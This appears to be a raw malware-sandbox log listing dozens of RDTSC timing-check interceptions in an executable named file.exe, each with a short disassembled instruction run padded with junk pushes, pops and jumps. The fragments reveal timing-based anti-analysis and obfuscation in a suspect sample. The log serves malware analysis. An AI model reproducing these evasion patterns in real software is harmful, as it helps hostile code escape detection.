Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBCE3 second address: 11FBD26 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007EFEB91CA550h 0x0000000d nop 0x0000000e call 00007EFEB91CA54Dh 0x00000013 mov dword ptr [ebp+122D2C94h], ecx 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2C1Eh], eax 0x00000022 push DD7F7680h 0x00000027 push eax 0x00000028 push edx 0x00000029 jo 00007EFEB91CA54Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBD26 second address: 11FBD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FBD2A second address: 11FBDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA558h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 22808A00h 0x00000014 mov edi, eax 0x00000016 push 00000003h 0x00000018 cld 0x00000019 push 00000000h 0x0000001b push 00000003h 0x0000001d movsx edx, dx 0x00000020 push 905D6172h 0x00000025 jns 00007EFEB91CA55Bh 0x0000002b add dword ptr [esp], 2FA29E8Eh 0x00000032 call 00007EFEB91CA558h 0x00000037 mov edi, 749094C1h 0x0000003c pop ecx 0x0000003d lea ebx, dword ptr [ebp+1244D991h] 0x00000043 jmp 00007EFEB91CA54Fh 0x00000048 xchg eax, ebx 0x00000049 jmp 00007EFEB91CA552h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 pop edi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBDD0 second address: 11FBDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBE43 second address: 11FBE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov di, EFD6h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f jmp 00007EFEB91CA553h 0x00000014 pop edi 0x00000015 push 7104CA0Ch 0x0000001a pushad 0x0000001b jo 00007EFEB91CA54Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBE74 second address: 11FBF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F4h 0x00000009 popad 0x0000000a xor dword ptr [esp], 7104CA8Ch 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFEB92DE1E8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000003h 0x0000002d sub ecx, dword ptr [ebp+122D27CEh] 0x00000033 push 00000000h 0x00000035 mov edx, dword ptr [ebp+122D28F6h] 0x0000003b push 00000003h 0x0000003d call 00007EFEB92DE1F3h 0x00000042 jnl 00007EFEB92DE1FCh 0x00000048 pop ecx 0x00000049 push FE55B627h 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007EFEB92DE1ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF09 second address: 11FBF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF0D second address: 11FBF68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3E55B627h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007EFEB92DE1E8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edi, eax 0x0000002c lea ebx, dword ptr [ebp+1244D99Ch] 0x00000032 sub dword ptr [ebp+122D2062h], eax 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b js 00007EFEB92DE1F2h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFDA second address: 121BFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFE1 second address: 121BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFE9 second address: 121BFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFEE second address: 121BFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BFF6 second address: 121C06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007EFEB91CA554h 0x00000010 jmp 00007EFEB91CA553h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007EFEB91CA54Eh 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007EFEB91CA558h 0x0000002c jmp 00007EFEB91CA551h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C477 second address: 121C48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007EFEB92DE1F0h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5E0 second address: 121C5F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5F4 second address: 121C5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5FC second address: 121C602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C602 second address: 121C614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007EFEB92DE1E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C614 second address: 121C618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C618 second address: 121C64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007EFEB92DE1F7h 0x0000000c jmp 00007EFEB92DE1EFh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C64A second address: 121C650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C650 second address: 121C654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C7BC second address: 121C7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007EFEB91CA546h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007EFEB91CA553h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007EFEB91CA54Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C957 second address: 121C977 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB92DE1F7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA92 second address: 121CA98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA98 second address: 121CA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA9E second address: 121CAA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF19 second address: 121CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF1F second address: 121CF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFEB91CA546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D090 second address: 121D0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007EFEB92DE1EAh 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFEB92DE1EDh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D0BF second address: 121D104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA552h 0x00000008 jmp 00007EFEB91CA559h 0x0000000d jmp 00007EFEB91CA555h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120FFF0 second address: 1210011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007EFEB92DE1F4h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210011 second address: 121001B instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFEB91CA546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121001B second address: 1210027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210027 second address: 121002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121002B second address: 121002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8067 second address: 11E806D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E806D second address: 11E8071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8071 second address: 11E8088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007EFEB91CA546h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D409 second address: 121D41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c jne 00007EFEB92DE1E6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9BE second address: 121D9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFEB91CA557h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9DD second address: 121D9E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9E3 second address: 121D9F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFEB91CA548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9F4 second address: 121D9FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D9FE second address: 121DA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DA02 second address: 121DA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DB76 second address: 121DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DEA9 second address: 121DEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007EFEB92DE1EEh 0x0000000b jmp 00007EFEB92DE1F9h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFEB92DE1F2h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121DEEB second address: 121DEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB64D second address: 11EB656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB656 second address: 11EB694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFEB91CA553h 0x00000010 jno 00007EFEB91CA560h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122441E second address: 122442E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224552 second address: 1224579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFEB91CA550h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224579 second address: 122458F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122458F second address: 12245B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFEB91CA54Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 js 00007EFEB91CA546h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12245B7 second address: 12245E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007EFEB92DE1EAh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jp 00007EFEB92DE1FAh 0x00000017 pushad 0x00000018 jmp 00007EFEB92DE1ECh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C58 second address: 1229C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007EFEB91CA55Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C79 second address: 1229C99 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB92DE1EAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007EFEB92DE1E6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229C99 second address: 1229CA3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229CA3 second address: 1229CD1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFEB92DE1EEh 0x00000008 jo 00007EFEB92DE202h 0x0000000e jmp 00007EFEB92DE1F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FA4 second address: 1228FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FB1 second address: 1228FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FB5 second address: 1228FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FC5 second address: 1228FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FC9 second address: 1228FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FD6 second address: 1228FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FDA second address: 1228FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007EFEB91CA546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007EFEB91CA546h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228FF3 second address: 1228FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229169 second address: 1229186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFEB91CA553h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229186 second address: 1229190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229190 second address: 12291D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA558h 0x00000009 jmp 00007EFEB91CA54Fh 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007EFEB91CA54Ch 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007EFEB91CA546h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291D4 second address: 12291D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291D8 second address: 12291DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12291DC second address: 12291E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122935D second address: 1229371 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB91CA54Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229371 second address: 1229380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229380 second address: 1229393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122993A second address: 1229942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229AE4 second address: 1229AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFE0 second address: 122BFED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFED second address: 122BFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C0B9 second address: 122C0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFEB92DE1E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C360 second address: 122C366 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8A9 second address: 122C8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8BB second address: 122C8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8C1 second address: 122C8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
